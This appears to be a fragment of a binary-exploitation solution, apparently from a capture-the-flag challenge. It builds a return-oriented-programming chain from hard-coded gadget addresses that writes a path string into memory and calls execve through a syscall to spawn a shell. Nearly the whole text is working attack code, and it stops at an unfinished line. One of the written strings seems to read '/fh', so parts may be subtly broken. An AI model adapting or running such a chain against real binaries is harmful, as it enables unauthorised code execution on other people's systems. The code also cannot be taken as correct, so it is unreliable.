payload = p64(0x40a5bb)
#0x40a5bb: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x441070)+p64(0x42de94)
# 0x000000000042de94: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x40a5bb)
# 0x40a5bb: pop rax ; retf
payload += p64(0x68662f)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x441074)+p64(0x42de94)
# 0x000000000042de94: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x40a5bb)
# 0x40a5bb: pop rax ; retf
payload += p64(0x0)+p32(0x411016)+p32(0x33)
# 0x411016: cdq ; retf
payload += p32(0x40a5bb)+p32(0x33)
# 0x40a5bb: pop rax ; retf
payload += p64(0x3b)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x441070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4149db)
# 0x00000000004149db: syscall; ret; 
payload +=
